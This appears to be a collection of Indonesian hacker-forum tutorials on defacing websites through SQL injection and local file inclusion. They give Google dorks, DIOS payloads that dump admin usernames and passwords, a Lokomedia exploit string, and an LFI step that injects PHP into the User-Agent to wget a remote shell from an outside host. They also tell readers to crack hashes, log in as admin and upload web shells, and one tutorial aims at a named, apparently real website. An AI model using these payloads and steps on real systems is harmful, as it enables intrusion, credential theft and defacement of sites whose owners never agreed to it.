Cara Deface POC SQLi With Dios

Hai...!

Kali Ini Gw Share Ilmu Lagi Ye Kan..
Tentang Cara Deface poc SQLi Manual...

Langsung Ae Gayn Ke Tutornya..
Cekidot..

[#] Bahan - Bahan [#]
1. Dork (Fresh Kaganya Tergantung Face :v)

inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="
inurl:".php?man_code="
inurl:".php?marque="
inurl:".php?sec_id="
inurl:".php?history_cms.php?selectCat="
inurl:".php?ph="
inurl:".php?aid="
inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"

Segitu Dulu Dorknya...
[NB .:: Kembangin Lagi Tod!! ::.]

2. Kuota Yang Cukup(Kalo Kaga Ada
    Ya Pake Wifi)

3. Kesabaran :v

4. Niat

5. Kopi,Rokok(Biar Santuy Eaa Coeg)

6. Dios

[#] Step By Step Defacenya [#]

1. Dorking Dulu Pake Dork Yang Di  Atas....

2. Pilih Site Target Yang Kira Kira Vuln...
Gw Pake Site
http://www.sitetarget.co.li/news.php?id=1

3. Cek Vuln Atau Nggaknya..
Caranya Tambain ' Di Target..

Contoh::

http://www.sitetarget.co.li/news.php?id=1

Jadinya..

http://www.sitetarget.co.li/news.php?id=1'

Kalo Vuln Ada Perubahan Dari Site Targetnya...
Misal :: (Your SQL Syntax Blablablabla , Blank , Ada Yang Berubah...)

4. Lanjut Ke Order Bynya..

http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
[KAGA ERROR]

Kita Cari Errornya:v

http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
[KAGA ERROR JUGA]
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
[KAGA ERROR JUGA]

http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
[KAGA ERROR JUGA]

http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
[ERROR NIH]

Lanjut Ke Union Select(Karna Kita Kan Dah Tau Tuh Jumlah Kolomnya...)

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-

Nah... Nongol Nih Angka Cantiknya...
3 , 2

Kita Masukin Diosnya Di angka Cantik Yang Nongol Tadi..

(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

Jadinya Gini...

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-

Next..
Kita Dump User Password adminnya
Caranya..

(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)

Begini Jadinya:v

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-

Nah Kan..
Nongol Noh User Pasword Adminnya :D
Next Cari Admin Loginnya(adlog)
Kalo Ada..
Langsung ae Login Pake User Password Yang Kita Dapet Tadi..
Kadang.. Passwordnya Harus Di Crack Lagi:v(Sandi Yang Berupa Algoritma" MD5,MD4,MD2,SHA1,Base64 dan banyak Lainnya)
Kalo Udah Berhasil Login..
Langsung Ae Cari Tempat Upload.
Upload Dah Tuh Shell Kebanggaan Klean..
Kemudian Akses Shell Yang Klean Tanam Di Web Tuh...

Sekian Dari Gw
[#] Mr.Kancil303 [#]

Kalo Ada Salah Kata
Gw Mohon Maap >_<

[#] Happy Deface :D [#]

Tutorial deface Method LFI

Kali Ini gw Share Ilmu Lagi Gaes:v
Ok Langsung ae Ye kan Tod :v

1. Bahan:
* Dork:
    inurl:index.php?nic=
    inurl:index.php?sec=
    inurl:index.php?content=
    inurl:index.php?link=
    inurl:index.php?filename=
    inurl:index.php?dir=
    inurl:index.php?document=
    inurl:index.php?view=
    !lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
    !lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
    !lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
    !lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
    !lfi /index.php?option=com_sectionex&controller= "com_sectionex"
    !lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
    !lfi /index.php?option=com_janews&controller= "com_janews"
    !lfi /index.php?option=com_linkr&controller= "com_linkr"
    !lfi /index.php?option=com_rpx&controller= "com_rpx"
    inurl:/view/lang/index.php?page=?page=
    inurl:/shared/help.php?page=
    (SELEBIHNYA LAGI KEMBANGIN LH TOD)

* Kopi(Biar Santuyyy)
* Tamper Data

Sdh langsung aja Next to Tutorial nya:
1. Dorking dulu seperti biasa
2. pilih web yg menurut luh perawan
3. Sdh dpt web nya? lanjuttt
    Contoh : http://site.com/info.php?file=news.php
4. Nah Next, kita ganti yg setelah = dgn ../../../
    Contoh: news.php diganti dgn ../../../
    Contoh: http://site.com/info.php?file=../../../
5. lalu kita mendapat error, seperti berikut...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.

6. Selanjutnya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?, (gmn klw gk error bg? klw gk error langsung dpt tuh file etc/passwd nya, tp klw masih error naikin teruss dir nya)
mari kita coba...

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

7. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti "/etc/passwd" dengan "/proc/self/environ"

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

8. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
Anda dpt mendownloadnya dr google
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

atau

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

lalu submit.

9. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

happy hacking !

[#] Thanks For :: Mr.Bulldog [#]

Cara Deface Method SQL Lokomedia

Hallo Guys;v

Balik Lagi Yekan Ama Gw:v

_/|Mr.Kancil303

Kali Ini Gw bakal Share Ilmu Lagi:v

Yaitu Cara deface Method SQL Lokomedia

Lanjut Gan:v

Siapin Dulu Bahan"nya tod

~ Dork

  • inurl:statis-1-profil.html

inurl:statis-2-profil.html

• inurl:statis-3-strukturorganisasi.html

• intext:lokomedia inurl:statis- ext:html

• intext:lokomedia inurl:kategori- 6 - .html

• intext:lokomedia inurl:semua- ext:html

• inurl:kategori-32-daerah.html site:.com

• intext:copyright by  inurl:statis-1 ext:html

~ Kuota

~ Kopi

~ Rokok:v

~ Exploit

  'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Tutorial ::

1.Dorking Dulu Tod Pake Dork Yang Di Atas,Kembangin Lagi Dorknya Biar Dapet Yang Perawan ;v

2. Pilih site Target yang Kira" bisa Di tusbol:v

3. Contoh Target gw

https://sitetarget.go.id/home/statis-1-profil.html

4. Masukin Exploitnya Yang diatas Tadi

Contoh : 

https://sitetarget.go.id/home/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Nah Kea Gitu Tod

Kalo Vuln Ntar Nongol Username,Password Adminnya

Kalo Kaga Ya Cari Lagi Lah Anjenk

5. Biasanya Sih Kalo Passwordnya Nongol Tuh Harus Di Crack Lagi ;v

Tapi kalo Lu Hoki Ya kaga Ngecrack Lagi Njenk

Nih web Crack Passnya

http://hashkiller.co.uk/Cracker/MD5

6. Next.... 

Cari Admin Loginnya 

Kalo nemu 

Login Pake User Pass Yang Nongol Tadi

Berhasil Login?

Cari Tempat Upload

Upload Dah Shell/SC Depes Burique Klean

U know Lah Diapain Lagi;v

Cari Aksesnya>Tebas

Sekian Dari Gw...

Bila ada Salah Kata Gw 

Mohon Di Maapkeun Yak Anjenk>:(

Regards Team :: B.S.C.A EXPLOITER TEAM

Copyright©2K19 _/|MR.KANCIL303

Tutorial SQL-I Print Name&Image

Tutorial SQL-I Print Name&Image,Version,Dll

Hallo Guys:"v

Balik Lagi Ama Gw MR-KANCIL-303 Yang Gans:v

Kali Ini Gw bakal Share Bokep:"v

Eh Ilmu:"v

.::::. CARA INJECT WEB http://www.florencemylove.com .::::.

Dah Gan Jan banyak Bacod:v Kita Mulai Ae Geloodnya:"v

Canda Gan;"v

Kita Mulai Ya njenk:v

Web Target .::. http://www.florencemylove.com

Disitu Tidak Ada Parameter Atau apa Segala Macam:"v

Makanya kita Cari Njenk:"v

Cara Nyarinya Gimana?

Disini W Pake Cara Dork 

inurl:php?id= site:florencemylove.com

Itu Dorknya

NB : Kalo dork begitu Jangan Ikut https / www nya...

Inget Njenk

Dorking Dulu Pake Yang Diatas Tadi

Pilih Gan Webnya

Misal gw Dapet Yang 

http://www.florencemylove.com/en/page.php?id=3

Kita Eksekusi:)

Cara mengetahui Vuln Nggaknya Gimana?

Tambain ' di Belakang Parameternya Contohnya

http://www.florencemylove.com/en/page.php?id=3

Kalo Udah Kita Perhatikan Tampilan Web yang Sebelum Di Kasih ' Sama Sesuda di kasih '

Kita lanjut:")

kita mulai cek satu persatu untuk menemukan dimana letak error nya.

http://www.florencemylove.com/en/page.php?id=3+ORDER+BY+1--[normal]

http://www.florencemylove.com/en/page.php?id=3+ORDER+BY+100--[normal]

Kita Coba Pake String Based😙

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+1--+-[normal]

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+10--+-[normal]

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+100--+-[error Cok]

Mundurin Njer

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+50--+-[ ERROR ]

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+47--+-[NORMAL]

http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+48--+- [ERROR]

Nah Disini Gw Errornya Di 48

Brarti Kolomnya 47

Kita Cek Union Selectnya Biar Nemu Angka Ajaibnya;"v

ok selanjut nya kita langsung menuju union select aja gan

http://www.florencemylove.com/en/page.php?id=3'http://www.florencemylove.com/en/page.php?id=-3'+AND+false+union--+%0aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -

NAH NONGOL NJENK ANGKA NYA

SELANJUTNYA YA U KNOW LAH :"V

MASUKIN DIOS LU DI ANGKA YANG NONGOL

CONTOH...

http://www.florencemylove.com/en/page.php?id=-3'+AND+false+union--+%0aselect+1,2,3,4,5,6,7,8,concat/**/**/(0x3C696D67207372633D2268747470733A2F2F692E706F7374696D672E63632F77423954376A4D522F32303139303732352D3130313533382E706E67222077696474683D2233303022203E203C62723E203C666F6E743E203C666F6E7420636F6C6F72203D207265643E494E4A4543544544204259204D522D4B414E43494C2D3330333C2F666F6E743E3C62723E3C62723E5445414D202E3A3A2E20424C41434B20534B554C4C2043594245522041524D593C62723E3C62723E,database(),0x3c62723e,@@hostname,0x3c62723e,@@tmpdir,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,schema(),0x3c62723e,session_user(),0x3c62723e,UUID(),0x3c62723e,current_user(),0x3c62723e,system_user(),0x3c62723e,@@GLOBAL.have_symlink,0x3c62723e,@@GLOBAL.have_ssl,@@port,0x3c62723e,@@log_error,0x3c62723e,@@socket,0x3c62723e,@@CHARACTER_SETS_DIR,0x3c62723e,@@pid_file,0x3c62723e,@@plugin_dir,0x3c62723e,@@wait_timeout,0x3c62723e,@@myisam_recover_options,0x3c62723e,@@collation_connection,0x3c62723e,@@version_compile_machine,0x3c62723e,@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -

Oke sekian Tutor Dari Gw

Terima Kasih:")

TEAM .:::. BLACK SKULL CYBER  ARMY

Tutor by MR-KANCIL-303🔥